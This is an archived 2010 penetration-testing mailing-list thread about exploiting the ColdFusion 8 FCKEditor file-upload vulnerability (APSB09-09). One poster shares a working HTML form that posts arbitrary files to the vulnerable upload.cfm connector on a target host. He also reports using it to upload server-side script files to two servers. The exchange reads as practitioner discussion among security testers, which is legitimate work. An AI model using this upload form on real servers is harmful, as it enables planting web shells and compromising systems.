Penetration Testing mailing list archives
Re: ColdFusion 8 w/ FCKEditor
From: The Dead <th3d34d () gmail com>
Date: Wed, 30 Jun 2010 17:59:04 -0300
I got two servers with this condition. In one of the server, CFM files were allowed to be uploaded as ASP and others. It was simple to upload to the server using a HTML based form as: <html> <form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?" method="post" enctype="multipart/form-data"> <input type="file" name="NewFile"></input> <input type="submit"> </form> In another server, CFM extensions and others like ASP, PHP are not allowed to be uploaded. So, I´m trying something to solve this case. On Wed, Jun 30, 2010 at 5:27 PM, The Dead <th3d34d () gmail com> wrote:
Thanks. I already got it!! Case solved! On Wed, Jun 30, 2010 at 5:06 PM, ADAMS, JEFF W (ATTSI) <ja3617 () att com> wrote:This should get you started:) http://theinterw3bs.com/?m=200910 -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of The Dead Sent: Tuesday, June 29, 2010 4:49 PM To: pen-test () securityfocus com Subject: ColdFusion 8 w/ FCKEditor Hi, Is there an exploit avaliable to this vulnerability or a detailed page explaining technical details about it? How can I exploit it? The vulnerability is: http://www.adobe.com/support/security/bulletins/apsb09-09.html. Thanks! ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- ColdFusion 8 w/ FCKEditor The Dead (Jun 30)
- Message not available
- Re: ColdFusion 8 w/ FCKEditor The Dead (Jun 30)
- Re: ColdFusion 8 w/ FCKEditor BonarCyber (Jun 30)
- Re: ColdFusion 8 w/ FCKEditor The Dead (Jun 30)
- Re: ColdFusion 8 w/ FCKEditor George A. Theall (Jun 30)
- Re: ColdFusion 8 w/ FCKEditor The Dead (Jun 30)
- Message not available